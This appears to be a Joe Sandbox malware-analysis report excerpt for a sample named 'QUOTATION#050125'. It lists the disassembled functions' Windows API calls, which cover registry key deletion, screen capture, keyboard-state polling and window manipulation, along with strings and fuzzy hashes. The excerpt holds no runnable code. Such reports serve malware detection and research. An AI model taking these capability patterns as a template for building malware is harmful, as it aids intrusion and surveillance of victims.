                                                                                      • Instruction ID: 0915a7c330b09240b3886f15c830174774ab2cfe60df5b1d81c46a24b7f5bf9a
                                                                                      • Opcode Fuzzy Hash: 3aae492a8d96ed1338959e3a1ee8f0f025a322108aa2bf382199b020d596e83a
                                                                                      • Instruction Fuzzy Hash: CFD11031A00205FFDB18AF65E885BBDB7B5BF46700F15845AF806AB681DB30EC45DBA1
                                                                                      Function 0014B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0014C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0014B6AE,?,?), ref: 0014C9B5
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0014B6F4
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0014B772
                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0014B80A
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0014B87E
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0014B89C
                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0014B8F2
                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0014B904
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0014B922
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0014B983
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014B994
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 1742008743-4033151799
                                                                                      • Opcode ID: 4e75b5ab40649feb6a14b9eedfbce8ae7dfd754ca8cbc32c0d7f60eded4c0608
                                                                                      • Instruction ID: 8fbe726e8f38adfeba607226fa23e26b618d025a73c7fa4f196586af40bcc72d
                                                                                      • Opcode Fuzzy Hash: 4e75b5ab40649feb6a14b9eedfbce8ae7dfd754ca8cbc32c0d7f60eded4c0608
                                                                                      • Instruction Fuzzy Hash: A4C17874208202EFD714DF24C4D5F6ABBE5BF84318F14849CF49A8B6A2CB71E946CB91
                                                                                      Function 0014255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 001425D8
                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001425E8
                                                                                      • CreateCompatibleDC.GDI32(?), ref: 001425F4
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00142601
                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0014266D
                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001426AC
                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001426D0
                                                                                      • SelectObject.GDI32(?,?), ref: 001426D8
                                                                                      • DeleteObject.GDI32(?), ref: 001426E1
                                                                                      • DeleteDC.GDI32(?), ref: 001426E8
                                                                                      • ReleaseDC.USER32(00000000,?), ref: 001426F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                      • String ID: (
                                                                                      • API String ID: 2598888154-3887548279
                                                                                      • Opcode ID: 59bd49cd40086a2e9da0b63a302cf42f3c5bff1a064b63d3f42f1dca6b18d002
                                                                                      • Instruction ID: 4c2e3508312c2c9584858dc80d611fe734d5d996d389a6372e76109831cfebda
                                                                                      • Opcode Fuzzy Hash: 59bd49cd40086a2e9da0b63a302cf42f3c5bff1a064b63d3f42f1dca6b18d002
                                                                                      • Instruction Fuzzy Hash: C861C2B5D00319EFCF04CFA4D884AAEBBB6FF58310F208529E955A7250D774A991CFA4
                                                                                      Function 0014C998 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 242COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0014B6AE,?,?), ref: 0014C9B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharUpper
                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                      • API String ID: 3964851224-909552448
                                                                                      • Opcode ID: 6de378dadab809f07c84dade009ff97e38042545585b314a18bdfdd4d3237031
                                                                                      • Instruction ID: ba71192b8de4c67bc6f792799368609e041d7518f69318802a0f1b4c6feaa0ae
                                                                                      • Opcode Fuzzy Hash: 6de378dadab809f07c84dade009ff97e38042545585b314a18bdfdd4d3237031
                                                                                      • Instruction Fuzzy Hash: 0671F33260116A8BCB60DF7CC9915FE3391AFA1794B350528F866A72A5FB31CE44C7E0
                                                                                      Function 00158D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00158D5A
                                                                                      • GetFocus.USER32 ref: 00158D6A
                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00158D75
                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00158E1D
                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00158ECF
                                                                                      • GetMenuItemCount.USER32(?), ref: 00158EEC
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00158EFC
                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00158F2E
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00158F70
                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00158FA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                      • String ID: 0
                                                                                      • API String ID: 1026556194-4108050209
                                                                                      • Opcode ID: 6a20533703d2c95c6a753d3b161dcf936852209e5d86f13b2564caf6da7eee88
                                                                                      • Instruction ID: af844f726131f46bf7bccf6ea476c6bea17e437a341c74bff9174a86be3cb9b8
                                                                                      • Opcode Fuzzy Hash: 6a20533703d2c95c6a753d3b161dcf936852209e5d86f13b2564caf6da7eee88
                                                                                      • Instruction Fuzzy Hash: 5881AF71604301EFD710CF24C885AABB7E9FB88355F04091AFDA5AB291DB70DD49CBA1
                                                                                      Function 0012BF30 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(00191990,000000FF,00000000,00000030), ref: 0012BFAC
                                                                                      • SetMenuItemInfoW.USER32(00191990,00000004,00000000,00000030), ref: 0012BFE1
                                                                                      • Sleep.KERNEL32(000001F4), ref: 0012BFF3
                                                                                      • GetMenuItemCount.USER32(?), ref: 0012C039
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0012C056
                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 0012C082
                                                                                      • GetMenuItemID.USER32(?,?), ref: 0012C0C9
                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0012C10F
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0012C124
                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0012C145
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                      • String ID: 0
                                                                                      • API String ID: 1460738036-4108050209
                                                                                      • Opcode ID: dd7b40be28e83d18e2be8b5af2b11344e51f5be6070ad57782e8ae72e00cc6bb
                                                                                      • Instruction ID: c86eed222bebbf01e171fc6fa06880ad389cd12d8aee5ca19b3b10d34afd9baa
                                                                                      • Opcode Fuzzy Hash: dd7b40be28e83d18e2be8b5af2b11344e51f5be6070ad57782e8ae72e00cc6bb
                                                                                      • Instruction Fuzzy Hash: 4E619E70A00366EFDB15CF64ED89AEEBBB8EF05344F140015FA01A7291D731AE65CBA0
                                                                                      Function 0014CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0014CC64
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0014CC8D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0014CD48
                                                                                        • Part of subcall function 0014CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0014CCAA
                                                                                        • Part of subcall function 0014CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0014CCBD
                                                                                        • Part of subcall function 0014CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0014CCCF
                                                                                        • Part of subcall function 0014CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0014CD05
                                                                                        • Part of subcall function 0014CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0014CD28
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0014CCF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 2734957052-4033151799
                                                                                      • Opcode ID: d0af634a031b4a05b1823aec30b54fa9eda5a19ba3d89a7935f3658f370c6403
                                                                                      • Instruction ID: 17e2d857282f53764eb53dca7a893d6bf258bca37461a61be06c5ec37b728b77
                                                                                      • Opcode Fuzzy Hash: d0af634a031b4a05b1823aec30b54fa9eda5a19ba3d89a7935f3658f370c6403
                                                                                      • Instruction Fuzzy Hash: C2316975902229FBDB209F94DC88EEFBB7CEF45751F000165B906E6260DB309A85DAE0
                                                                                      Function 000E00C6 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • InitializeConditionVariable, xrefs: 000E0148
                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 000E0122
                                                                                      • SleepConditionVariableCS, xrefs: 000E0154
                                                                                      • WakeAllConditionVariable, xrefs: 000E0162
                                                                                      • kernel32.dll, xrefs: 000E0133
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule$CountCriticalInitializeSectionSpin
                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                      • API String ID: 798235881-1714406822
                                                                                      • Opcode ID: 760f69713b5321131463fec95190ac7a8132f6708318221ccf88951f578287c9
                                                                                      • Instruction ID: 236bb34a75d5f244cce21c7547222afc45e7153933c5d9457546064ce3327cfc
                                                                                      • Opcode Fuzzy Hash: 760f69713b5321131463fec95190ac7a8132f6708318221ccf88951f578287c9
                                                                                      • Instruction Fuzzy Hash: 1C21F932645751EFE7115FB5AC45B6A33E4EB04B62F00012AF841BE692DFF09C808AD0
                                                                                      Function 0012E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • timeGetTime.WINMM ref: 0012E6B4
                                                                                        • Part of subcall function 000DE551: timeGetTime.WINMM(?,?,0012E6D4), ref: 000DE555
                                                                                      • Sleep.KERNEL32(0000000A), ref: 0012E6E1
                                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0012E705
                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0012E727
                                                                                      • SetActiveWindow.USER32 ref: 0012E746
                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0012E754
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0012E773
                                                                                      • Sleep.KERNEL32(000000FA), ref: 0012E77E
                                                                                      • IsWindow.USER32 ref: 0012E78A
                                                                                      • EndDialog.USER32(00000000), ref: 0012E79B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                      • String ID: BUTTON
                                                                                      • API String ID: 1194449130-3405671355
                                                                                      • Opcode ID: f1666b891133d20e7e25230337679ec41063a87a9ab86da56b3d1505cc3b3cef
                                                                                      • Instruction ID: a58cd018d3710180bd8d65ffac8d44d0f9de0e42b03d2402974624867fe727ad
                                                                                      • Opcode Fuzzy Hash: f1666b891133d20e7e25230337679ec41063a87a9ab86da56b3d1505cc3b3cef
                                                                                      • Instruction Fuzzy Hash: 6A21A570204315FFEB105F60FCC9A253BA9F75474AF200426F91686EB2DB71ADE08BA4
                                                                                      Function 0012E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0012EA5D
                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0012EA73
                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0012EA84
                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0012EA96
                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0012EAA7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: SendString
                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                      • API String ID: 890592661-1007645807
                                                                                      • Opcode ID: 2142bb915ad185d3f43c4d5aea8c94bd5a6eb44fe6d9736b7a9bcef4bdf08632
                                                                                      • Instruction ID: 4fea441773fe8b1a09985cf6a30ba43b2cd82b4a57931bd6c05a91cf430b7c37
                                                                                      • Opcode Fuzzy Hash: 2142bb915ad185d3f43c4d5aea8c94bd5a6eb44fe6d9736b7a9bcef4bdf08632
                                                                                      • Instruction Fuzzy Hash: DE112131A902697DD724B7A1EC4AEFF6ABCEBD1B04F400429B411A20D1EF705A55CAB0
                                                                                      Function 00129F91 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?), ref: 0012A012
                                                                                      • SetKeyboardState.USER32(?), ref: 0012A07D
                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 0012A09D
                                                                                      • GetKeyState.USER32(000000A0), ref: 0012A0B4
                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 0012A0E3
                                                                                      • GetKeyState.USER32(000000A1), ref: 0012A0F4
                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 0012A120
                                                                                      • GetKeyState.USER32(00000011), ref: 0012A12E
                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 0012A157
                                                                                      • GetKeyState.USER32(00000012), ref: 0012A165
                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 0012A18E
                                                                                      • GetKeyState.USER32(0000005B), ref: 0012A19C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: State$Async$Keyboard
                                                                                      • String ID:
                                                                                      • API String ID: 541375521-0
                                                                                      • Opcode ID: 9025b4e355585ff980efb164c19ea2335440ecf858c8ab53cabd6563460a2a35
                                                                                      • Instruction ID: 31eac235040f3ab7f83e59c9af97000a8d3e053d9c4869e1257ca020fd28132a
                                                                                      • Opcode Fuzzy Hash: 9025b4e355585ff980efb164c19ea2335440ecf858c8ab53cabd6563460a2a35
                                                                                      • Instruction Fuzzy Hash: 74513B309047A86BFB35DBB0A9107EABFF49F12380F484589D5C25B1C2DB54AA5CCB63
                                                                                      Function 00125CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00125CE2
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00125CFB
                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00125D59
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00125D69
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00125D7B
                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00125DCF
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00125DDD
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00125DEF
                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00125E31
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00125E44
                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00125E5A
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00125E67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                      • String ID:
                                                                                      • API String ID: 3096461208-0
                                                                                      • Opcode ID: d24021537454a9bf3f907bff1e5ebea5b89bb2bab4d9252a0a944edb1858ad3e
                                                                                      • Instruction ID: e0b0a436e47fad12bc0bf8fb4459cd6f825917ef28f508afe612e0341c615152
                                                                                      • Opcode Fuzzy Hash: d24021537454a9bf3f907bff1e5ebea5b89bb2bab4d9252a0a944edb1858ad3e
                                                                                      • Instruction Fuzzy Hash: 23510E71A00719AFDB18CFA8DD89AAEBBB6FB48301F148129F515E6690D7709E50CB60
                                                                                      Function 000D8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000D8BE8,?,00000000,?,?,?,?,000D8BBA,00000000,?), ref: 000D8FC5
                                                                                      • DestroyWindow.USER32(?), ref: 000D8C81
                                                                                      • KillTimer.USER32(00000000,?,?,?,?,000D8BBA,00000000,?), ref: 000D8D1B
                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00116973
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,000D8BBA,00000000,?), ref: 001169A1
                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,000D8BBA,00000000,?), ref: 001169B8
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000D8BBA,00000000), ref: 001169D4
                                                                                      • DeleteObject.GDI32(00000000), ref: 001169E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 641708696-0
